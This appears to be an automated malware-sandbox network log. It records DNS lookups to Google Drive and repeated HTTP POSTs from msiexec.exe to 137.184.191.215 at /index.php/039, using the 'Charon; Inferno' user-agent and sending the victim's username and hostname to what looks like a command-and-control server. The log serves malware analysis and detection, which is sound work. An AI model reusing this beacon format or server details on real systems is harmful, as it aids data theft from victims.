                                Sep 30, 2024 10:04:44.921691895 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:44.926491022 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588433981 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588480949 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588502884 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588536024 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588536978 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.588556051 CEST8049765137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.588582993 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.588593960 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.588715076 CEST4976580192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.737379074 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.742569923 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.742722034 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.745021105 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.749893904 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:47.749965906 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:47.754801989 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.391940117 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.391962051 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.391974926 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.392059088 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.392277002 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.392585993 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.396008015 CEST4976680192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.397133112 CEST8049766137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.531420946 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.536330938 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.540013075 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.542316914 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.547060966 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:50.551239014 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:50.556101084 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.167238951 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.167262077 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.167319059 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.167318106 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.167332888 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.167375088 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.167795897 CEST4976780192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.177093983 CEST8049767137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.309596062 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.314659119 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.314740896 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.316770077 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.321604967 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:53.321681023 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:53.326546907 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:55.967161894 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:55.967178106 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:55.967189074 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:55.967201948 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:55.967251062 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:55.967288017 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:55.967724085 CEST4976880192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:55.972449064 CEST8049768137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:56.107012033 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:56.111849070 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:56.111938000 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:56.114135981 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:56.118971109 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:56.119034052 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:56.123833895 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:58.721940041 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:58.721962929 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:58.721973896 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:58.722040892 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:04:58.722254038 CEST8049769137.184.191.215192.168.2.4
                                Sep 30, 2024 10:04:58.722305059 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:05:00.626013994 CEST4976980192.168.2.4137.184.191.215
                                Sep 30, 2024 10:05:00.630937099 CEST8049769137.184.191.215192.168.2.4
                                Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                Sep 30, 2024 10:02:50.114861012 CEST  64054        53         192.168.2.4  1.1.1.1
                                Sep 30, 2024 10:02:50.121891022 CEST  53           64054      1.1.1.1      192.168.2.4
                                Sep 30, 2024 10:02:51.157027006 CEST  52967        53         192.168.2.4  1.1.1.1
                                Sep 30, 2024 10:02:51.164002895 CEST  53           52967      1.1.1.1      192.168.2.4
                                Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class        DNS over HTTPS
                                Sep 30, 2024 10:02:50.114861012 CEST  192.168.2.4  1.1.1.1  0x1ebc    Standard query (0)  drive.google.com              A (IP address)  IN (0x0001)  false
                                Sep 30, 2024 10:02:51.157027006 CEST  192.168.2.4  1.1.1.1  0xaf0e    Standard query (0)  drive.usercontent.google.com  A (IP address)  IN (0x0001)  false
                                Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                          CName  Address          Type            Class        DNS over HTTPS
                                Sep 30, 2024 10:02:50.121891022 CEST  1.1.1.1    192.168.2.4  0x1ebc    No error (0)  drive.google.com                     142.250.185.206  A (IP address)  IN (0x0001)  false
                                Sep 30, 2024 10:02:51.164002895 CEST  1.1.1.1    192.168.2.4  0xaf0e    No error (0)  drive.usercontent.google.com         142.250.184.193  A (IP address)  IN (0x0001)  false
                                • drive.google.com
                                • drive.usercontent.google.com
                                • 137.184.191.215
                                Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
                                0           192.168.2.4  49740        137.184.191.215  80                416  C:\Windows\SysWOW64\msiexec.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 30, 2024 10:03:37.757720947 CEST  241                OUT        POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 176
                                Connection: close
                                Sep 30, 2024 10:03:37.762734890 CEST  176                OUT        Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: 'ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2CF5etq
                                Sep 30, 2024 10:03:40.197251081 CEST  1236               IN         HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:38 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:40.197280884 CEST | 224 | IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:03:40.197293997 CEST | 1236 | IN
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:03:40.197310925 CEST | 142 | IN
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.4 | 49741 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:03:40.290482044 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 176
                                Connection: close
                                Sep 30, 2024 10:03:40.295444965 CEST | 176 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: 'ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2CblCyc
                                Sep 30, 2024 10:03:43.206630945 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:40 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:43.206684113 CEST | 1236 | IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:03:43.206756115 CEST | 366 | IN
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
                                Sep 30, 2024 10:03:43.409176111 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:40 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.4 | 49743 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:03:43.412652969 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:43.419898987 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:03:45.961947918 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:43 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:45.961966038 CEST | 224 | IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:03:45.961976051 CEST | 1236 | IN
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:03:45.961982965 CEST | 142 | IN
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.4 | 49744 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:03:46.116745949 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:46.121629000 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:03:48.746252060 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:46 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:48.746311903 CEST | 224 | IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:03:48.746321917 CEST | 1236 | IN
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:03:48.746332884 CEST | 142 | IN
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                4 | 192.168.2.4 | 49745 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:03:48.898016930 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:48.902903080 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:03:51.612746954 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:49 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:51.612768888 CEST | 1236 | IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:03:51.612775087 CEST | 366 | IN
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                5 | 192.168.2.4 | 49746 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:03:51.759485006 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:51.764343977 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:03:54.245615005 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:52 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:54.245687008 CEST | 1236 | IN
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:03:54.245723009 CEST | 366 | IN
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                6 | 192.168.2.4 | 49747 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:03:54.400741100 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:54.406913042 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:03:57.201477051 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:54 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                7 | 192.168.2.4 | 49748 | 137.184.191.215 | 80 | 416 | C:\Windows\SysWOW64\msiexec.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 30, 2024 10:03:57.370493889 CEST | 241 | OUT | POST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:57.375312090 CEST | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:04:00.028433084 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:57 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
